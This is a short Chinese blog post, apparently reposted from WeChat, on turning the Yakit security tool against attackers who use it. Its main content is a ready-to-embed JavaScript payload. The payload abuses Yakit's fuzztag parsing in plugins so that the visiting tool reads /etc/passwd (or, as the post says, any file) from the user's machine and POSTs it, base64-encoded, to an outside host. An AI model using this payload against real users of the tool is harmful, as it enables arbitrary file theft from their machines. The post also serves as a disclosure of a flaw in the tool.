利用yakit功能特性溯源攻击者
2023-8-10 21:50:9 Author: mp.weixin.qq.com(查看原文) 阅读量:0 收藏

杜绝废话,随便在页面上嵌入一个js,内容是:

<script>
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://yakit.com/filesubmit");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(`file={{base64enc(file(/etc/passwd))}}`);
</script>

可自由发挥,读任意文件。

原因:yakit默认不会对经过MITM PROXY的流量中的fuzztag进行解析,但是经过插件时会被解析,所以这也是利用限制。

顺便吐槽:yakit跑起来卡卡的,啥时候能优化到和burp一样啊。


文章来源: https://mp.weixin.qq.com/s?__biz=Mzg5ODE3NTU1OQ==&mid=2247484236&idx=1&sn=ef0c14a89721800b2311d0e487388399&chksm=c067c464f7104d72fe90b8fc525a48eb068d83859bc15bcad520d481d150c565890f1edc4a86&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh